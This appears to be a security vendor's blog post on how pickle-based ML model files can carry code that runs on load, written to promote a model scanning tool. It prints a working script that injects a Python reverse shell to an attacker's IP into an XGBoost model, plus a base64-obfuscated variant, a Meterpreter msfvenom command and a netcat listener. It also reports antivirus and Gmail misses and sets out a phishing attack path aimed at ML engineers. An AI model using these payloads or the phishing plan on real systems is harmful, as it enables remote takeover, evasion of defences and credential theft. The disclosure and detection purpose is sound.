
Model Files are Invisible Viruses

The Underestimated Risk of Model Files in Machine Learning

When a Machine Learning (ML) model is trained, it lives in memory. Saving it to disk so it can be shared with others requires serializing it to one of several formats. The most common and prominent formats, such as pickle, are vulnerable to deserialization attacks: code can be injected into the model file and will run the moment the model is loaded. The injected code does not affect the model’s ability to perform inference, which makes malicious models difficult to detect unless specific tools such as Protect AI’s Guardian are used. Today’s antiviruses and email filters don’t detect payloaded model files, making them the perfect phishing campaign attachment. Move over PDFs and macro-enabled Word documents, model files are the new kingphisher.
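The root of the problem is how pickle itself works: during unpickling, the format can instruct Python to call arbitrary callables. Any object can define a __reduce__ method, and pickle.load will invoke whatever callable it returns, with whatever arguments it supplies. Here is a minimal sketch of that mechanism (the file name and echoed message are purely illustrative):

import os
import pickle

class MaliciousPayload:
    # pickle records the callable and arguments returned by __reduce__;
    # pickle.load() then calls them, so os.system runs on the loader's machine.
    def __reduce__(self):
        return (os.system, ('echo "this ran the moment the file was unpickled"',))

# Write the booby-trapped pickle to disk.
with open("innocent_model.pkl", "wb") as f:
    pickle.dump(MaliciousPayload(), f)

# Anyone who loads it executes the command above.
with open("innocent_model.pkl", "rb") as f:
    pickle.load(f)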

How to Payload a Model

Payloading a model is simple. Protect AI has provided examples for doing so in the modelscan repository:

git clone https://github.com/protectai/modelscan/

cd modelscan/notebooks

Now save the script below as “inject.py”; when run, it creates a model payloaded with a simple Python reverse shell that connects back to the attacker’s machine whenever the model is loaded:

 

import sys
import pickle

import pandas as pd
import xgboost
from sklearn.model_selection import train_test_split

# Helper from the modelscan notebooks that injects code into a pickle file
from utils.pickle_codeinjection import generate_unsafe_file

if len(sys.argv) != 3:
    print('Usage: python inject.py <attacker IP> <attacker port>')
    sys.exit(1)

# Arguments
ip = sys.argv[1]
port = sys.argv[2]
model_filename = "xgboost_model.pkl"

# Train a small XGBoost model on toy data
data = {'target': [1, 0, 1, 0, 1, 0], 'data1': [1, 2, 3, 4, 5, 6], 'data2': [1, 1, 1, 1, 1, 1]}
df = pd.DataFrame(data)
X = df[['data1', 'data2']]
Y = df['target']
X_train, X_test, y_train, y_test = train_test_split(X, Y, test_size=0.2, random_state=42)
model = xgboost.XGBClassifier()
model.fit(X_train, y_train)

# Save the benign model to a pickle file
with open(model_filename, "wb") as f:
    pickle.dump(model, f)

# Load the benign model back in
with open(model_filename, 'rb') as file:
    model = pickle.load(file)

payloaded_model_path = "payloaded_xgboost_model.pkl"
command = 'system'

# The malicious code: a Python reverse shell back to the attacker's machine
malicious_code = f'python3 -c \'import pty;import socket,os;t="meterpreter";s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{ip}",{port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")\''
print(malicious_code)

# Generate a new payloaded model that still works for inference
generate_unsafe_file(model, command, malicious_code, payloaded_model_path)

Run the script:

python inject.py 192.168.0.1 4444
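For the reverse shell to actually land, the attacker’s machine also needs a listener waiting on the chosen port before the victim loads the model; for the simple Python shell, a plain netcat listener such as the one below (using the port from the example above) is enough:

nc -lvnp 4444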

 

A file named payloaded_xgboost_model.pkl will be created in the directory. Let’s take a look at it.
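If you want to peek inside the file yourself, here is a minimal sketch using only the Python standard library (this assumes, as the modelscan helper does, that the injected opcodes live in the same pickle stream as the model):

import pickletools

with open("payloaded_xgboost_model.pkl", "rb") as f:
    raw = f.read()

# The reverse shell command is stored in the file as plain text
print(b"pty.spawn" in raw)  # True

# Disassembling the opcode stream shows the injected call sitting
# alongside the legitimate XGBoost objects
pickletools.dis(raw)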

We created an XGBoost model with a very obvious, unobfuscated reverse shell payload that would give an attacker at the 192.168.0.1 IP address complete system access to any victim’s computer that loads the model. Note that we added a cheeky do-nothing variable in the payload storing the string “meterpreter” to see if we could help out the antiviruses in flagging this as a malicious file. Let’s see how they do.
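For completeness, here is a hedged sketch of the victim’s side, assuming (as the modelscan notebook demonstrates) that the injection helper preserves the original model object: the injected command runs during the load, and the object handed back is still a fully working classifier.

import pickle
import pandas as pd

# This single line fires the injected reverse shell via the pickle machinery;
# with the 'system' option the command runs before load() returns.
with open("payloaded_xgboost_model.pkl", "rb") as f:
    model = pickle.load(f)

# The model itself is untouched and predicts normally.
print(model.predict(pd.DataFrame({"data1": [2], "data2": [1]})))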

Testing Antiviruses Against a Malicious Model

To illustrate the severity of this issue, we conducted tests on four different types of model files against a number of popular antiviruses:

  1. Plain XGBoost Model: A standard machine learning model file. As expected, no antivirus triggered on this because there was no malicious code.
  2. Python Reverse Shell Model File: A model file embedded with a simple reverse shell script, allowing remote access as seen above.
  3. Python Reverse Shell Model File (Base64 Encoded): Very simple obfuscation of the Python reverse shell, using base64 encoding (a sketch of this encoding follows this list).
  4. Meterpreter Reverse Shell: An old and commonly used reverse shell that connects back to the sophisticated Metasploit Framework. The tool msfvenom was used, with no encoding or special features, to generate a one-line Meterpreter reverse shell.
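For the base64-encoded variant, the obfuscation really is as trivial as it sounds. Here is a hedged sketch of how the injected command can be wrapped (the exact wrapper used in our test may differ slightly):

import base64

ip, port = "192.168.0.1", 4444

# The same reverse shell one-liner as before...
inner = (
    "import pty,socket,os;"
    f's=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{ip}",{port}));'
    "os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);"
    'pty.spawn("/bin/bash")'
)

# ...now hidden behind a base64 blob that is only decoded at load time.
encoded = base64.b64encode(inner.encode()).decode()
malicious_code = f"python3 -c 'import base64;exec(base64.b64decode(\"{encoded}\"))'"
print(malicious_code)

The Meterpreter model can be produced the same way, with the command string coming from a stock msfvenom invocation (for example, something along the lines of msfvenom -p python/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port>, with no encoder applied).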

Microsoft Defender

Payload Type                           | Detected
Python Reverse Shell                   | No
Python Reverse Shell (Base64 Encoded)  | No
Meterpreter Reverse Shell              |

 

In more than a decade as a red teamer, I have found Microsoft Defender to be shockingly effective at detecting even obfuscated payloads, which makes the lack of detection on the most obvious payload, the Python reverse shell, rather surprising. Below is the screenshot of Microsoft Defender failing to find either the Python reverse shell or the base64-encoded Python reverse shell.

AVG & Avast!

 

Payload Type                           | Detected
Python Reverse Shell                   | Yes
Python Reverse Shell (Base64 Encoded)  | No
Meterpreter Reverse Shell              |

 

AVG and Avast! are owned by the same parent company and have almost identical products. We tested both and found they were able to beat out Defender in detecting the simple Python reverse shell, but failed to detect the payload when it was only slightly obfuscated by base64. Below is a screenshot of AVG failing to find the base64-encoded Python reverse shell.

 

BitDefender

Payload Type                           | Detected
Python Reverse Shell                   | No
Python Reverse Shell (Base64 Encoded)  | No
Meterpreter Reverse Shell              |

 

BitDefender, like Microsoft Defender, also failed to trigger on the basic Python reverse shell, as can be seen below.

 

 

MalwareBytes

 

Payload Type                           | Detected
Python Reverse Shell                   | No
Python Reverse Shell (Base64 Encoded)  | No
Meterpreter Reverse Shell              | No

 

MalwareBytes detected no threats, not even in the Meterpreter reverse shell, as can be seen below.

 

A Real-World Attack Scenario

As we can see, not a single antivirus detected the base64-encoded Python reverse shell. Some didn’t even detect the Meterpreter shell, which has been a de facto tool in hackers’ arsenals for 20 years! Attackers can easily gain internal network access, bypass your firewall, and steal models, data, and credentials via the following simple attack path:

  1. Targeting via LinkedIn: A hacker searches LinkedIn for machine learning engineers at a specific company.
  2. Email Harvesting: Using tools like TheHarvester.py, the hacker determines the company's email format, often first.lastname@company.com.
  3. Phishing Attack: A carefully crafted phishing email is sent to the engineer, containing the base64-encoded Python reverse shell model file.
  4. Bypassing Security Measures: This email successfully bypasses Gmail's filters as demonstrated in the screenshot below.
  5. Compromise: The high-privilege machine learning engineer's computer is compromised, granting the hacker extensive access to models, data, and further credentials, which can be sprayed across the network to deepen the penetration.

Interestingly, even the most obviously payloaded model file with a Meterpreter backdoor bypasses Gmail’s attachment scans and goes right to the inbox. Consider the following phishing attempt:

Straight to the inbox, attachment included, with a “Scanned by Gmail” message giving the receiver a false sense of security.

Attackers have an infinite number of tries to get a message to members of your organization. If there’s strong email filtering, attackers can always just send the message through LinkedIn, X, Facebook, etc. They can research their phishing target and drop details into the phishing email that the target would assume only trusted people have access to, increasing the chance of the attachment being opened. Implementing education and safe processes in your organization is the only defense against attacks like this.

Recommendations

This exploration into the vulnerabilities of model files in machine learning environments highlights a critical need for more robust security measures. It's not just the data or the code; the model files themselves can be trojan horses. We recommend getting started with the open source modelscan tool to scan model files for potential threats, or contact us to learn how Guardian can help your enterprise automatically block models that contain malicious code. All of the payloaded model files used above are detected by modelscan, which also covers a multitude of other model formats that can be payloaded, such as the serialization formats used by PyTorch, Keras, and TensorFlow.
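As a quick start, here is a hedged sketch of what scanning the payloaded file from this post looks like with the open source CLI (flags per the modelscan README; output formatting may vary between versions):

pip install modelscan

modelscan -p payloaded_xgboost_model.pkl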

Find it on GitHub here: https://github.com/protectai/modelscan.